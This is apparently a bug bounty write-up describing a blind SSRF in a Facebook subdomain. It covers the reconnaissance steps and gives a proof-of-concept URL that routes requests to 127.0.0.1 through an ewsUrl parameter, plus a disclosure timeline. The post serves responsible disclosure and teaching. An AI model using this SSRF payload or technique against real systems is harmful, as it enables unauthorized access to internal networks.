Uncovering a blind SSRF Vulnerability in Facebook’s Infrastructure ($10000 — Bug Bounty)

Amine Aboud
2 min readDec 5, 2020

--

Subdomains enumeration + File bruteforcing + JS analysis = $10K Blind SSRF

This is a write-up about a blind SSRF vulnerability I found and reported to Facebook.

The vulnerability could have allowed a malicious actor to send internal requests to the Facebook corporate network.

1) Subdomains Enumeration

By doing some subdomains enumeration, I discovered the following active subdomain: phishme.thefacebook.com

If you have read my previous article, “Story of a weird vulnerability I found on Facebook” you are aware of my interest in ‘403 Forbidden’ errors.

2) Javascript File Bruteforcing

By employing a custom wordlist and conducting a file brute force on the path:

https://phishme.thefacebook.com/**.js

I identified a hidden Javascript file named “Home.js” located at:

https://phishme.thefacebook.com/Home.js

3) Code Review of Home.js

By analyzing the code of Home.js file, I identified an interesting function « sendPhishRequest » that was using XMLHttpRequest to request data from some specific links.

A deeper analysis revealed its usage as follows:

Util.sendPhishRequest(‘PhishGetItemData.ashx’, { itemId: itemId, ewsUrl: ewsUrl, token: token }

Exploitation:

After conducting a series of experiments and testing various token formats, I was finally able to successfully exploit the function Util.sendPhishRequest to send internal requests.

Params:

itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

POC:

https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

The stack trace errors not only facilitated a deeper understanding of the internal request handling mechanisms but also provided concrete evidence of the blind SSRF vulnerability's existence.

Timeline:

August 7, 2020: Reported
August 11, 2020: Triaged
August 11, 2020: Patched
December 3, 2020: Resolved
December 3, 2020: $10000 Bounty awarded

Amine Aboud

Twitter: https://twitter.com/amineaboud

--

--